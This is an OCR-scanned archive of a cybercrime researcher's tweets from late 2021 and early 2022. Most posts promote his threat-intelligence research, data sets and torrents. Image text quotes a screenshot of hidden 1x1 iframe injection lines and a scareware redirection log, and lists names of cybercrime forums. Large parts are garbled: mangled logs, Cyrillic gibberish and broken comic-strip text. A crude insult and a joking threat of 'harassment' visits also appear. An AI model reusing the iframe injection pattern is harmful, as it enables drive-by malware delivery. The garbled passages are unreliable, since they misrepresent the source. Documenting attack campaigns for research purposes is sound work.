that you’re interacting with the bad guys to the point of oblivion. Bad stuff. 


05:48 


Backups and contingency planning techniques and mechanisms including disaster 
recovery and actual implementation of post-breach recovery process techniques are 
crucial to deal with this type of threat and hence this is the reality. 


05:48 


Buzz word generation is bad stuff especially in a world where | originally remember 
that it was @taosecurity who originally coined the term advanced persistent threat 
while | was busy emphasizing in the "malicious economies of scale" term at the time. 


05:48 


Keep your sources secret and confidential try to come up with new new content 
around the bad guy’s activities that’s actually worth going through and don’t forget 
that you should never interact with the bad guys in one way or another just monitor 

them 


05:48 


The ransomware threat? The rise of the penetration testing crowd? The "certificate 
crowd"? The rise of threat hunting as a profession? Keep it simple stupid (KISS 
strategy) and don’t fuel growth into the bad guy’s business model. That’s cybercrime 
1.0 


05:48 


Try to do your best in terms of OPSEC when doing cybercrime research and bad guys 
research and profiling and so your best to communicate your findings as soon as 
possible including to communicate your research to as many people as possible. 


05:48 

Catch up here - https://t.co/JTcqOaYgET including here - https://t.co/UZ6qVANXVF and 
stay tuned! 

05:48 


Keep track of industry leading blogs and publications try to find out and emphasize 
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on the technical perspective behind today’s modern rise of the cybercrime enterprise 
and always try to track them down and profile and attempt to take them offline. 


05:50 
My mother’s present for Christmas. https://t.co/o5GycNQUFp 
08:29 
https://t.co/MIMAgUwDgh 
08:29 
https://t.co/rLaighdAho 
08:30 


https://t.co/lwWh6wIM8W 
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08:30 


08:30 


08:31 


08:31 


08:31 


08:31 


08:39 


11:40 


https://t.co/wuuDOxrp8Z 


https://t.co/Cmau52THYx 


https://t.co/GOfOsIxB4b 


https://t.co/POAivIFez} 


https://t.co/rt3MUkyaUd 


https://t.co/MOG4H90zmw 


https://t.co/eGilP6durk 


https://t.co/qLxz4GuRip [PDF] https://t.co/g50p9XfZyv 


Cyber 


Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 


The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 
Source Including Various Underground Market Propositions 
Exposed 


https://ddanchev.blogspot.com 


Dancho Danchev 


18 - Saturday 


00:33 
https://t.co/zg7gV6K5Q1 [PDF] https://t.co/LJN7tcidi9 
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03:38 
https://t.co/JTcqOaYgET https://t.co/hixbwjA5MN 


03:39 


https://t.co/JTcqOaYgET https://t.co/SpEXmuF6eE 


03:39 


https://t.co/JTcqOaYgET https://t.co/BBhGzaCmaA 
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03:53 


On the road 


. https://t.co/L2eLZ62QqS 
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04:57 


I’m flattered. https://t.co/i8VJFYtHKW 


So, what this means Is that any individual's success in the industry comes down to things like reputation, how well you 
can bullshit, etc, But ultimately we have no way to differentiate, say, Bruce Schneier, who has a long academic- and 
professional-grade track record and a habit of writing in a highly intellectual fashion on difficult topics, from Dancho 
Danchev, who is a random Russian dude very few people know anything about, who posts random snippets of facts that 
pass for “analysis.” 


04:59 
Takes you back doesn’t it? https://t.co/ml97FsOX2t 
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hilary kneber @hilarykneber - Jan 16, 2011 Vv 
#DANCHO DANCHEV Does anyone know .Is there a way I can determine 
the exact date that Dancho Danchev began to “unfollow" me? 


05:02 
Back in the day. https://t.co/i6Bhzo4DeY 


05:26 


Happy holidays! https://t.co/Q5kOTsqF8C 
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05:28 


Happy holidays! https://t.co/tiVLtv3dZK 
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05:28 


Happy holidays! https://t.co/etN7zg8JsO 


05:29 
Attending a private party. Approximately a decade ago. https://t.co/gCygKZ282Y 
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05:31 


Just when you thought I’m missing. Gotcha! https://t.co/Pbl17xXhgf6 
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05:32 
Happy holidays! https://t.co/bzqvitwp40 


05:34 
Old Twitter cover photos. Courtesy of me. https://t.co/MucO3MOW1V 


*1 
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a ; 
— 
DDanchev 
Costs Daddy 
Money 


Dancho Danchev 


05:35 


— ; 
 ——_ 
DDanchev 
Costs Daddy 
Money 


Dancho Danchev 


https://t.co/JTIcqOaYgET https://t.co/BOTtO9gBPx 


341 


06:57 


https://t.co/nNsXMPrGi0 https://t.co/TdwnbezBG1 
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Tre rhonnrynues 
PR OO T BE ©€ & 


Underground Who’s Who in 
Cyber Crime for 2007? 


iframe src=./n404-1.htm width=1 height=1 ></iframe> 
iframe src=. {n404-2.htm width=1 height=1 ></iframe> 
i =,/n404-3.htm width=1 height=1 ></iframe> 
=,/n404-4.htm width=1 height=1 ></iframe> 
./n404-5.htm width=1 height=1 ></iframe> 


iframe src=.{n404-6.htm width=1 height=1 ></iframe> 
iframe src=./n404-7.htm width=1 height=1 ></iframe> 
iframe src=.{n404-8.htm width=1 height=1></iframe> 
iframe src=./n404-9.htm width=1 height=1></iframe> 


18:46 
https://t.co/eGilP6durk 
18:47 
https://t.co/3O0Etoz0Tvv 
18:47 
https://t.co/aiHCMkEoAD 
18:47 
https://t.co/se5hIPllaF 
18:47 
https://t.co/M7l6vTDu7a 
18:48 
https://t.co/sZXGMvSSgK 
18:48 


https://t.co/XdTkKQMkWm1 
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18:48 
https://t.co/ixAOmiA0O0d 


18:48 
https://t.co/99acM24Alq 


19 - Sunday 


21:57 
https://t.co/UZ6qVANXVE https://t.co/zDYzD4gaTi 


Dancho Danchev 


An In-Depth Picture 
Inside Security 
Researcher's Dancho 
Danchev Understandin 
of Security Hacking an 
Cybercrime Incidents 


Dancho 


Danchev's 
Personal 
Security 
Hacking and 
Cybercrime 
Research 
Memoir 
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21:57 


20 - Monday 


07:07 


https://t.co/UZ6qVANXVE https://t.co/3z3qGaYt5H 


r 
Dancho 
Danchev's 
Security 
Research 
Compilation 


“Never-published before security research articles 
and OSINT analysis at Dancho Danchev's Medium 
account” 


By Dancho Danchev 


https://t.co/FdQd7iGsds https://t.co/iK39YKDLC1 
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Table 9: Quality of selected intelligence sources (10 out of 45) 


07:14 
https://t.co/RftVOpFC3C https://t.co/DvmyE1tdJ9 
07:15 
https://t.co/aAs2RawETM 
*1 
18:10 


This is me on the Dark Web - https://t.co/cQq40tVcwD #security #cybercrime 
#malware #CyberSecurity #CyberAttack #cyberattacks #Threatintel 
#Threatintelligence #ThreatHunting #threatreport https://t.co/53Bn0rpKdc 


21 *1 
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22 - Wednesday 


02:13 


https://t.co/fnswrm8KWP #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #Threatintelligence #threatreport #threatintel 
https://t.co/Zgx92fvdxXb 
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23 - Thursday 


11:24 


@selenalarson Check this out! This is so old school and scareware related that | can’t 
stop referencing it. This is a screenshot of a sample redirection campaign that’s using 
my name in the URL structure. | have a few more in the works if you want me to 
share them. https://t.co/Ydvelz5uAE 


24 200 HTTP isthe-boss.com | herd 4,906 texte 
~] 

a 

‘is 2 HTTP homeandofficelun.com /oo. phplideD022ibeyescheS9actoe! 5S tet/enl 
9)°% 200 HTTP wtenswarccrinexcamarv).com = /i/iid-2022bemernth Bhatk= RIO TQSOONQENS.IDO 13,535 = text/eni 
Sw 20 HTTP ertensesrecrinescammervi.com fi fengiiquery.s $5,746} spolkcaticr/.. 
ou 20 HrTe antenserconinescammerv3.com [i fengiiquery-t. is 681 pplication. 
» 

gis «moO OMTTP artensarconinescannery3.com | fenegiistfie js 13,220 application/.. 


11:27 


Takes you back doesn’t it? https://t.co/JTcqOaYgET #security #cybercrime #malware 
#cyberattacks #CyberAttack #Threatintel #Threatintelligence #ThreatHunting 
#threatreport https://t.co/3XFuwTuYGp 


‘94 20) ONTTP ithe-boss.com | tend 4,906 text{inl 

>) 

2) cok 

‘is 32 HTTP homeandofficelun.com /oo. phplid=2022ibeyesciMeS9atow! 5S tester 
a9 200 wre wtenswarccrinexameavi).com §/i/fid-20220emernth hack RID TQSOONQES.IDO 13,535 = text/reni 
Sw 20 HTTP ertensweercorinescammerv3.com Ii fengiiquery.6 $5,746 36 appkcatir/.. 
au 200 «HTTP artensbsrconinescanneny).com | ifergiqueryre.js 681 agplication/.. 
>») ' , 

13 200 HITTP artensiwarcorinescammervs.com |i feng/istile.ts 13,220 applicator. 


My security predictions for 2022? The #ransomware epidemic will be fought using 
common logic while using customer support Dark Web onions for negotiations or by 
saying - "hey Dmitry is it you on the other side of the chat?" https://t.co/JTcqOaYgET 


*1 
11:35 


@SwiftOnSecurity Or in the best possible case they can also listen to my album 


*1 
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courtesy of "fans" all around the globe - https://t.co/zhtnSGqqPa 


https://t.co/emldJ6NtJs 


/ Os 
DANCHO DANCHEV 
SUCK MY DICK 


11:39 
@tarah LinkedIn resume export seems to work just fine. At least for me. Keep it up! 
11:44 

@Treadstone71LLC Happy holidays Jeff! 


24 - Friday 


01:40 


Awesome. This is me making the news! Stay tuned. "Acing the IOC Game: Toward 
Automatic Discovery and Analysis of Open-Source Cyber Threat Intelligence" - 
https://t.co/NoRSaHb1jG [PDF] #security #cybercrime #malware #Threatintel 

#Threatintelligence https://t.co/iynsFTTQAO 


Table 9: Quality of — intelligence ——_ (10 - of 45) 


of 
Blog — Bes! 
—— 10Cs 


PaloAlto 
Malwarebytes 
Hexacorn 


19:16 


https://t.co/DUBHsc9qNw #security #cybercrime #malware #CyberAttack 
#cybercriminals #Threatintel #Threatintelligence #threathunting 
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27 - Monday 


05:25 


Folks. Happy holidays and happy New Year Celebration! Keep up the good work and 
keep up the spirit and big thanks to everyone who approached me in 2021 with 
research requests or just to say "hi". Keep up the spirit! Regards. Dancho 
https://t.co/RUCPFfSO3X 


*1 


28 - Tuesday 
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18:53 


Happy Holidays! Grab all of my publicly accessible research as a Torrent! Direct 
download available! - https://t.co/Ar8MYfSIYQ #security #cybercrime #malware 
#CyberSec #CyberAttack #ThreatHunting #Threatintel #Threatintelligence 
#threatreport https://t.co/aNv7M2nw6m 


18:54 


Big news! Grab a copy of my official "Cybercrime Forum Data Set for 2021" for free in 
the form of a Torrent! Direct download available - https://t.co/I8AL7DQBb5 #security 
#cybercrime #malware #CyberAttack #ThreatHunting #Threatintel 
#Threatintelligence https://t.co/ZzHobMcdPlirw 


21 ¥*1 


<parent> Darkmoney iHonker ShadowMarket 


11Wang DarkWeb LinkFeed SkyFraud 
365Exe DomenForum Linuxac.org Spyhackerz 
419eater Eviloctal Master-X Svuit.vn 
4HatDay Exelab MasterWebs Szenebox 
aHack Forum-UINSell MaulTalk Szuwi 
Aljyyosh Forum.Zloy.bz Mmpg.ru Tenebris 
Antichat.ru ForumSape = Mr11-11mr.7olm.org TheBot 
ArmadaBoard ForumSEO Nullnoss.org Toolbabase.se 
BigFozzy Free-hack pay-per-install.org — TotalBlackhat 
BlackhatWorld ghostmarket.net PhreakerPro Turkhackteam 
BPCForum Gla.vn Piratebuhta.pw Vsehobby 
Cardvilla GoFuckBiz ProCrd Webmasters.ru 
Chf gofuckbiz.com ProLogic Whitehat.vn 
CNHonker H4kurd.com Promarket WWH-Club 
CNSec Hack-Port ProxyBase www.opensc.ws 
Crack-Forum Hackersoft scamwarners Xakep.bg 
Cracked to Hackingboard SEOCafe Xakepok 
Cyberizm Hackings SEOForum Zismo 
Darkmarket.la iFud 


30 - Thursday 


17:33 


New layout - https://t.co/fnswrm8KWP #security #cybercrime #malware 
#CyberSecurity #cybersecuritytips #cyberattacks #CyberSec #Threatintel 
#ThreatHunting 
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2022 


January 


1 - Saturday 


08:23 


Grab the torrent! https://t.co/ZH8epDDTWP #security #cybercrime #malware 
#CyberAttack Enjoy! https://t.co/E30s4cVu49 


23 *1 


08:23 
Grab the torrent! https://t.co/TqP4kY7bwF #security #cybercrime #malware 
#CyberAttack Enjoy! https://t.co/xEq2vE6q3h 
22 2 
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<parent> Darkmoney iHonker ShadowMarket 
11Wang DarkWeb LinkFeed SkyFraud 
365Exe DomenForum Linuxac.org Spyhackerz 
419eater Eviloctal Master-X Svuit.vn 
4HatDay Exelab MasterWebs Szenebox 
aHack Forum-UINSell MaulTalk Szuwi 
Aljyyosh Forum.Zloy.bz Mmpg.ru Tenebris 
Antichat.ru ForumSape = Mr11-11mr.7olm.org TheBot 
ArmadaBoard ForumSEO Nullnoss.org Toolbabase.se 
BigF ozzy Free-hack pay-per-install.org TotalBlackhat 
BlackhatWorld ghostmarket.net PhreakerPro Turkhackteam 
BPCForum Gla.vn Piratebuhta.pw Vsehobby 
Cardvilla GoFuckBiz ProCrd Webmasters.ru 
Chf gofuckbiz.com ProLogic Whitehat.vn 
CNHonker H4kurd.com Promarket WWH-Club 
CNSec Hack-Port ProxyBase www.opensc.ws 
Crack-Forum Hackersoft scamwarners Xakep.bg 
Cracked.to Hackingboard SEOCafe Xakepok 
Cyberizm Hackings SEOForum Zismo 
Darkmarket.la iFud 
11:00 
https://t.co/jqyBRrDbeD #security #cybercrime #malware #CyberAttack 
#cyberattacks #Threatintelligence 
*1 
2 - Sunday 
03:46 


Guess what? The World’s most popular and in-depth search engine for hackers and 
security experts is back - https://t.co/OdJ7QhPjP5 check out the front page - 
https://t.co/fnswrm8KWP including our Wordpress blog - https://t.co/T3YfdBnuVz 


03:49 


"Visiting the GCHQ With the Honeynet Project Circa 2008 - A Conference and Event 
Recap" - https://t.co/FdQd7iGsds #security #cybercrime #malware #cyberattacks 
#ThreatHunting #threatintelligence 


*1 
03:50 
"Modularity, Monocultural Insecurities and the Establishment of a NSA culture in the 


cybercrime world - Keep it coming?" - https://t.co/2hfqnBoPEu #security #cybercrime 
#malware #cyberattacks #ThreatHunting #threatintelligence 
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03:50 


"Foreign Influence Operations - “Sock Puppetry” or “Let me Catch Up with Russian 
Active Measures”?" - https://t.co/CTXOoRYV1n #security #cybercrime #malware 
#cyberattacks #ThreatHunting #threatintelligence 


03:51 


"Silence in the Dark - How to Establish the Foundations for a Successful OPSEC 
Strategy for the Purpose of SIGING Cyber Asset Discovery?" - https://t.co/qugnqoixXg] 
#security #cybercrime #malware #cyberattacks #ThreatHunting #threatintelligence 


03:52 


"Exclusive Interview with https://t.co/X2Z28aSWfB’s Primary Project Operator - 
Security Researcher - Dancho Danchev" - https://t.co/O2ss8ghqkj #security 
#cybercrime #malware #cyberattacks #ThreatHunting #threatintelligence 


*1 
03:53 


"Introducing https://t.co/X2zZ28aSWfB’s Flagship “Data Paradise” Old-School 
KGB-Style Dial-In Intranet" - https://t.co/ocngNKjASC #security #cybercrime 
#malware #cyberattacks #ThreatHunting #threatintelligence 


03:54 


"Introducing https://t.co/X2zZ28aSWfB’s Flagship Hacking and Security Search Engine! 
We're back! Introducing https://t.co/X2zZ28aSWfB’s Flagship Hacking and Security 
Search Engine! We're back!" - https://t.co/vo5KLLIhm1gq #security #cybercrime 
#malware 


04:14 


Who's into VR? Who’s into VR for information security? | did this project in my spare 
time and we’re currently accepting donations and crowdsourcing the funding. Check 
out project Cybertronics here - https://t.co/8VvgQ10IJL #security #cybercrime 
#malware 


el 


08:00 


https://t.co/WIBGTU5ryT #security #cybercrime #malware #threatintel 
https://t.co/wS3vLkoD5n 


08:00 


https://t.co/Qokw7qnyYf #security #cybercrime #malware #threatintel 
https://t.co/CS5aab2LZVv 


Dancho Danchev's Blog - 
Mind Streams of 
Information Security 
Knowledge 


08:01 


https://t.co/cQq40tVcwD #security #cybercrime #malware #threatintel 
https://t.co/YNfOnf7106 
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08:02 


https://t.co/8KKLYQSBQB #security #cybercrime #malware #threatintel 
https://t.co/cK2DzZOpkQn 


*1 


Popular Tags: 
Hacker Group Cybercrime Forum Cybercrime Forum Community 
Cybercrime Community Cybercrime Forum Data Set 


Unit-1 


wid 


23 


Leadi ber Threat intelligence Products Porta 


08:02 


https://t.co/OmUajr8DT8 #security #cybercrime #malware #threatintel 
https://t.co/JJCFCqG6PN 
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Disruptive individuals - Boutique Cyber Intelligence Services 


“We make Cyber Intelligence 
impact where no one has 


been before!" 


Our Services 


Technical Collection s Oo 


08:03 


https://t.co/sMWCGUWR6g #security #cybercrime #malware #threatintel 
https://t.co/iyyv2qswLK 


Dancho Danchev, svi 


oo 
Exposing the “Data Leaks” Paradise — A 
Qualitative Analysis of Today's “Data 

Concho Danthev Leaks” Paradise 

Ooo 

2 

ad 

© 

6 


3 - Monday 

07:44 

https://t.co/gej8f4CWpN #security #cybercrime #malware #CyberAttack #CyberSec 
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#Threatintel #ThreatHunting 


08:33 


https://t.co/fnswrm8KWP #security #cybercrime #malware #CyberAttack #CyberSec 
#Threatintel #ThreatHunting https://t.co/wZUMJ7COhC 


08:34 


https://t.co/fnswrm8KWP #security #cybercrime #malware #CyberAttack #CyberSec 
#Threatintel #ThreatHunting https://t.co/MNBaQvFfo3 


Hello world! 
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4 - Tuesday 


13:30 


"A Copy of Dancho Danchev’s CV - An In-Depth Perspective on the Cybe Threat 
Landscape - An Analysis" - https://t.co/iM3H2foW3y #security #cybercrime 
#malware #CyberAttack #CyberSec #cybersecuritytips 


21 *1 
13:31 
"A Peek Inside Today’s Modern RATs (Remote Access Tools) and Trojan Horses 
C&amp;C (Command and Control) Communication Channels - An OSINT Analysis" - 


https://t.co/WkN6lOsnYs #security #cybercrime #malware #CyberAttack #CyberSec 
#cybersecuritytips 


2 
13:32 
"A Peek Inside Today’s Modern Cybercrime Ecosystem - A Portfolio of Currently Active 


Cybercrime-Friendly Forum Communities - An OSINT Analysis" - https://t.co/kKI5qLJPJc7 
#security #cybercrime #malware #CyberAttack #CyberSec #cybersecuritytips 


22 *%1 
13:32 
"Exposing a Currently Active Portfolio of Domains Belonging to Iran-Based Hacker 


Groups and Lone Hacking Teams - An OSINT Analysis" - https://t.co/C4TUvMnBu8 
#security #cybercrime #malware #CyberAttack #CyberSec #cybersecuritytips 


21 *%2 
13:33 
"Multiple Security/Cybercrime Research/OSINT/Threat Intelligence Gathering Memoir 


Compilations - An Analysis" - https://t.co/Pkw48BZ5t0O #security #cybercrime 
#malware #CyberAttack #CyberSec #cybersecuritytips 


23 *l1 
13:38 


Who wants to help me drive growth for my research and really really motivate me to 
present the crown jewels of my research online? Grab an account today - 
https://t.co/WIBGTU5ryT RT pls! #security #cybercrime #malware 

13:38 


Bulk orders for organizations and vendors including teams accepted at - 
https://t.co/WIBGTU5ryT drop me a line at dancho.danchev@hush.com #security 
#cybercrime #malware 
13:39 


Finally! It’s here! The Second Edition of my official "Cybercrime Forum Data Set for 
2021" - https://t.co/rgsEandTx7 grab a copy today! Direct download available! Stay 
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tuned! #security #cybercrime #malware 


13:40 


https://t.co/rgsEandTx7 RT pls! #security #cybercrime #malware #CyberSecurity 
#CyberAttack #CyberSec #cybersecuritytips 


15:30 


@mrisher @kevincollier It gets even more interesting. Check out some of my latest 
research here - https://t.co/KqhOgR63gE and here - https://t.co/AGHOL4TKgd 


*1 
22:56 


Want to give your team or organization a pretty decent and good situational 
awareness in the World of cybercrime fighting and cyber threat actor profiling 
including cyber intelligence? Grab a lifetime account today - https://t.co/eKnnHPq85t 


5 - Wednesday 


00:33 


It’s official and we're live! Grab a copy of my Second Edition of my Cybercrime Forum 
Data Set for 2021 and improve your situational awareness in the World of cybercrime 
research - https://t.co/rgsEandTx7 let’s catch some bad guys! 


11:53 
Jessus! Jessus! - https://t.co/3nuHFv5csD #NowPlaying 
12:26 
Takes you back doesn’t it? https://t.co/fCGJetBX8H 
*1 


13:03 


Quote of the day - "If terrorism is a form of crime then cybercrime is a form of 
economic terrorism". 


raat 
13:04 

Quote of the day - "An OSINT conducted today is a tax payer’s buck saved 

somewhere". 
13:07 
God bless! - https://t.co/toNzEdf8Xs 

6 - Thursday 
02:58 


Re-defining the very basics of total irrelevance peasant-aria including the very basics 
of agricultural "economy". Courtesy of "Republic" of #Bulgaria. Sanctions anyone? 
You bet - https://t.co/p5JOSk3IDd This is me on #Bulgaria - https://t.co/oxz4STGXwr 

https://t.co/uv7ym4qZpM 
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03:19 


03:19 


03:19 


03:19 


03:19 


—_——__- --- — 


“en, na 27 romnnn 


BE tics 
Tlonog 3a macroamara xocnmTaansanaa: [locranna 4a pHs ITuT ) 
MCHXHATpHYcH CTaUHOKHAap H AO MACTORUUIA MOMCHT He ¢€ moAzBA 

(CHCLIMAAHSHpPaHA NcuxnaTpHina gomout JloreggH.c UpegHema ng, PY wm 

AMBP.» Dpoat . ey poe anal, DAT BML 
ornntlensgunH OT porirreaire “8 HorexenNeTO AaTMpa o 

PONTO A= MECC OAM, KOLATO, SaMHEOA a *KHNCe CaM Ha KBaprHpa | 

UTLPBHA MECC MOATSP KAA CKEHERHA BpPRIKA c TAX Ir 
cReseepoHa, O-CACH TORA cipAA Aa ce OGaxuta. Ha nospEnBannun oT TAXH: 

HCTPRMA TIC OFNOBAPAA HAH H3KAIONBAA TeaecbouuTe cu. Topa rt NpHTecHMao 1 
Te SANOYWNMAAM Ja TO HAMHpHaT aKTHBHO. TloayaHat MHCMO OT Xa3aHHa, 4e AK 
15.09.10r. tpa6ea na ocnoGon#T KBAaprupaTa, a TaKA CbUIO MH HAKOAK: 

OGaoarAHEsT G8 HETAATeHH ANIHMTOBH BHOCKH 3a 3akynen OT CHM@ HM AarITon 
Ha nocotenara sata Te oriinan 6 Cocbusa, KEeTO HaMeCpHAH Cita CH a cn 
& kuaprHpata. Orkasna,s 2a ropopH ¢ Tax, 6a rpy6 Hu xaanen. CeOpann uw 

Garaxa 3070 ce BEpHat » Tpoan, Tol rt ocrasia npea xKpaprupata mo; 


. Mpemaor, 4e ¢ 3aeT 4 JAMHHAA HAKDAC C TaxcH. Cach saBpbulaHeTo B Tpost 


OTKAIGAA JA KOHTAKTYBA C pomsTcaTe HC Apyrit nosHaTH. SarBapAA ce mi 
1GIA B CTAATA Cit, OTKAIBAA AA Ce Xpalt eeeuHO c Tax. Hanmyckaa Aoma cu 6c 
“Ra mapa oG6AcHCHHA KBRe XOZH H Kora ue ce BypHe. Tpomanata 1 
SROMCHCURCTO , ety GHAR) SKONCTATHPAHA MH OT cDceA MH MpHATeAH Hi 
ncemeiicrporo, ‘Konto. Jlat4o nosMMHABAA KaTO Harrbato NenosHariH. Tips 
ormpanenn sa6eacKKH oF Crpana wa MaiikaTa ,3anouBaa fa araesa AouiO” 
HascaKane xone, c mpcHocumua kKomnioTap, Tacmaa TeAcBH3HA OT OKO 
MCTLP PASCTOAHHE, SAKAIONBAA H TO HAKOAKO IThTH NpoMepaABAA BXOMHAT: 


BpaTa abi Seite omee: Herocpeactrseno npenH HaMecaTa Ha NOAMUMAT: 
cont Seuienuy ymorpesanas oi peste cod TepMHH 0 Sratea 
https://t.co/eA8DCIZgNQ 
https://t.co/I8IN78UTpe 
https://t.co/Q7QgXQ3xn7 


https://t.co/qhX7shFRLQ 


https://t.co/tfoGvc4oyK 
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03:19 
https://t.co/YAvxahXPUO 


03:23 
Check this out! Keep it coming! Awesome! - https://t.co/glICLBSgtM8 
03:23 
https://t.co/MPhUGY6IKD 
03:23 
https://t.co/VemuwgD7EV 
03:24 
https://t.co/fQygqc3AgB 
03:24 
https://t.co/RWTfPvmedT 
03:24 
https://t.co/w34T4rA4pj 
03:24 
https://t.co/XVWI8CfrBB 
03:25 
https://t.co/wa0q57QPdw 
8 - Saturday 
04:47 
https://t.co/lvQmH4tbSD 
04:47 
https://t.co/kyLVXzkI6i 
04:48 
https://t.co/imRPmj73cE 
04:48 
https://t.co/kDvWT5q5en 
04:48 


https://t.co/qCjuZz8mmZ 
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04:49 
https://t.co/rAkmhC873G 


21:06 

https://t.co/sGHnvYmNrP 
21:06 

https://t.co/22wCdqL2D9 
21:06 

https://t.co/d6djJAo32r 

10 - Monday 
14:58 


https://t.co/HBrH9ck2qD #security #cybercrime #malware #CyberAttack 
#cybersecuritytips #cyberattacks #CyberSec #threatreport https://t.co/crl2QHpnZO 


Pe faba od Hoty pd 
1M Never eng be Petter ome hechowrs 
"he River ant b atime of thee 


COMEMO Pretend - Ae 
Amaty nis 


Meret Steer prety 


1 ageing 8 Peart of 


16 - Sunday 


12:16 


The Lab circa 2006 when | originally finished studying in the Netherlands up to 
present day! Stay tuned! #security #cybercrime #malware #CyberAttack 
#cyberattacks #ThreatResearch #ThreatIntelligence https://t.co/4AA4uft8up 


12:19 


Courtesy of me! #security #cybercrime #malware #CyberAttack #cyberattacks 


#ThreatResearch #Threatintelligence https://t.co/DxwObpjRRk 


23 *1l 


All wresrares is aren on aeconeee 


Such dare interference 
with Do's cyber assets is 
unacceptable. Initiate an 

immediate traceback! 


cumiertie cyber 
deception! While 
they concentrate 
on the mail 
servers, we'll 
transmit back the 
data obtained 
from the infected 


Our NIDS 


from the Russian 
to faciliate OSINT 
through botnets. 
“Ensure your 
victory before 
starting a battie*, 
said Sun Tzu! 


The Chinese are 
getting smarter 
Andrei. Last 


It's called 


the attack 
population" 
Yuri. 
Perhaps we 
should print 
out new 


month they 
bought access to 
mil and .gov 
infected hosts 
only, and took at 


“segmenting 


this Pentagon brochures. . 


puppet show now 


mailsevers. 


www. stripgeneroator.com 


12:23 


https://t.co/zg7gV6K5Q1 [RAR] #security #cybercrime #malware #CyberAttack 
#cyberattacks #ThreatResearch #ThreatIntelligence CC: @Treadstone71LLC 
https://t.co/FDtrja4frp 


21 %1 


KAMALIAN Behrouz | POB: Tehran | Head of the IRGC- linked “Ashiyaneh” cyber group. 10.10.2011 


DOB: 1983 | The “Ashiyaneh” Digital Security, founded by Behrouz 
Kamalian is responsible for an_ intensive cyber- 
crackdown both against domestic opponents and 


reformists and foreign institutions. On 21 June 2009, 
the internet site of the Revolutionary Guard's Cyber 
Defence Command posted still images of the faces of 


people, allegedly taken during post-election demon- 
strations. Attached was an appeal to Iranians to 
“identify the rioters”. 


12:27 


ZDNet Zero Day headshot! Here we go! https://t.co/HLHdhYbdX3 [PDF] #security 
#cybercrime #malware #CyberAttack #cyberattacks #ThreatResearch 
#Threatintelligence https://t.co/8zibNFZ7tH 
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12:37 


Cheers! #security #cybercrime #malware #CyberAttack #cyberattacks 
#ThreatResearch #Threatintelligence https://t.co/oN730kcUvh 


EXPOSING KOOBFACE: THE 
WoRLD's LARGEST BOTNET 
DANCHO DANCHEV Cyber 


iy Be a 


{ 
Ne 
GION * Wy 


WS) 


’ 


12:41 


Webroot headshot! Here we go! - https://t.co/tW2LuSxdSi [PDF] #security 
#cybercrime #malware #CyberAttack #cyberattacks #ThreatResearch 
#Threatintelligence https://t.co/9ELpotiuKD 
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12:47 


Cheers! #security #cybercrime #malware #CyberAttack #cyberattacks 
#ThreatResearch https://t.co/8SHLn5gjtm 


369 


105 INCLIIDING 
SEWRITY 222 
RAUL 


12:52 


Keynote at CyberCamp 2016! #security #cybercrime #malware #CyberAttack 
#cyberattacks #ThreatResearch https://t.co/pZ7PuAeldV 


BE arin Eonducied a several hours experiment in 
t November, 2009 when for the first time ever client-side 


« The Koobface gang was behind the massive (1+ million 
affected web sites) scareware serving campaign in 
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17 - Monday 


05:07 


https://t.co/qLxz4GuRip #security #cybercrime #malware #Threatintelligence 
#Threatintel #ThreatHunting #ThreatResearch https://t.co/2kvm87d9Ds 


Cyber 
Intelligence 


18 - Tuesday 


02:15 


https://t.co/WIBGTU5ryT #security #cybercrime #malware #CyberAttack 
#CyberSecurity #CyberSecurityAwareness #cybersecuritytips #Threatintelligence 
#ThreatHunting #threatintel https://t.co/5kxAAJ56Hz 
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22 - Saturday 


09:22 


Quote of the day - "Communications without intelligence is noise. Intelligence 
without communications is irrelevant." Cheers and thanks @Cryptome_org for 
mentioning my research! #security #cybercrime #malware #CyberSecurity 
#Threatintelligence #Threatintel https://t.co/TT2cvYcyLM 


27 *5 
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Image 4 : Electronic Warfare (ELINT) 2 
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Image 6 : NCW Attack Formation 


23 - Sunday 


07:46 


What "we" do in the Lab circa 2022! Big thanks to my ex-employer @Webroot for 
making this happen! Anyone who says "thanks" and "congrats" gets a "harassment" 
visit by me looking for you at a major security conference. Be cool! 
https://t.co/emQDx3fyF6 
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07:46 


What "we" do in the Lab circa 2022! Big thanks to my ex-employer @Webroot for 
making this happen! Anyone who says "thanks" and "congrats" gets a "harassment" 
visit by me looking for you at a major security conference. Be cool! 
https://t.co/ioYFJ9QABv 
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07:47 


What "we" do in the Lab circa 2022! Big thanks to my ex-employer @Webroot for 
making this happen! Anyone who says "thanks" and "congrats" gets a "harassment" 
visit by me looking for you at a major security conference. Be cool! 
https://t.co/PNPUYFefCl 


07:47 


What "we" do in the Lab circa 2022! Big thanks to my ex-employer @Webroot for 
making this happen! Anyone who says "thanks" and "congrats" gets a "harassment" 
visit by me looking for you at a major security conference. Be cool! 
https://t.co/ucteefQdbv 


376 


07:48 


What "we" do in the Lab circa 2022! Big thanks to my ex-employer @Webroot for 
making this happen! Anyone who says "thanks" and "congrats" gets a "harassment" 
visit by me looking for you at a major security conference. Be cool! 
https://t.co/xGLc5vIPze 
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27 - Thursday 


05:58 


https://t.co/JIcqObfRwr #security #cybercrime #malware #CyberAttack 
#cyberattacks #cybersecuritytips #CybersecurityNews #ThreatHunting 
#Threatintelligence https://t.co/oTqtlPtkyD 
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Dancho Danchev's Blog - Mind Streams of 
Information Security Knowledge 


the nec ay on the 
This blog cor trends and fads. tacts and strategies. imersecting with 
speculations and real-time CYBERINT assessments, aif packed with sarcastk athtede 


reve an teat end © Di hererne 
TOME, CAN POH, SCMagauine, 


07:45 


"We" - my employer @whoisxmlapi and | are going public with this next week. It will 
go live here - https://t.co/tYYVSZW9zo where I’m acting as a DNS Threat Researcher 
since January, 2021. Stay tuned and grab an account today! #threatintel 
#threatintelligence https://t.co/204hdT5So0Y 
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Dancho Danchev Presents 


The International 
OSINT Journal 
Compilation on 

Online T 


Hate and ed 
Social M 5 


Thee Definite OSINT and Actionable Threat Intelligence 
Compilation Guide to Assist Law Enforcement and the U.S 
Intelligence Community Internationally 


Dancho Danchev 


https://ddanchev.blogspot.com Email: dancho.danchevehush.com 


08:17 


@virusbtn Congrats! This is me in a previous life - https://t.co/uaLnPImMxET almost 
reaching 11,000 followers and for the record make sure you don’t end up here - 
https://t.co/KXVoOMMFaeW although this should be considered a privilege. Keep up the 
good work! Dancho 


08:27 


